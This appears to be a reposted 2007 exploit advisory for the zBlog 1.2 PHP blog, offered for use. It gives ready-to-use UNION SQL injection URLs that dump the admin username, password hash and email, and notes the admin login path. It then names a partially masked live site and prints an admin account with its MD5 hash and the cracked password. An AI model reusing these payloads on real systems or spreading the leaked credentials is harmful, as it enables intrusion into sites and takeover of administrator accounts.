zBlog 1.2 Remote SQL Injection Vulnerability

    [阴 December 23, 2007 10:08 | by ]
#########################################################################
            zBlog v1.2  Remote SQL Injection Exploit
#########################################################################
## AUTHOR     : H-T Team ( HouSSamix _ ToXiC350 _ CoNaN )
## HOME     : http://no-hack.net

## Script         : zBlog
## Version    : 1.2
## Site         : http://kaxz01.free.fr/
## Download    : http://kaxz01.free.fr/fichiers/zBlog.zip

## EXPLOITS :

[1]
http://server.com/Path/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20[table prefix]_admins--
[2]
http://server.com/Path/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20[table prefix]_admins--

[table prefix] = by default it is zblog

ex : http://Site.com/zBlog/index.php?page=articles&article=-1%20union%20select%201,pseudo_admin,3,motdepasse_admin,5,6,7,8,9,10,11,12,13,14,15,16,17,email_admin%20from%20zblog_admins--

## Note
admin login is at /admin/

## GREETZ  :  RoMaNcYxHaCkEr , Mahmood_Ali , C_m  and all musulmans hackers

#########################################################################
            zBlog v1.2 Remote SQL Injection Exploit
#########################################################################

exemple of site vulnerable

http://www.xxx.org/zblog/index.php?page=categ&categ=-1%20union%20select%201,pseudo_admin,motdepasse_admin,4,5,6,7,8,9,10,11,12,13,14,15,16,email_admin%20from%20zblog_admins--


account admin with password md5 cracked

user >> Selim
pass >> 6a81060b83b919bc115112bf840eca63 = miles

Bug&Exp | Comments(0) | Trackbacks(0) | Reads(7995)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive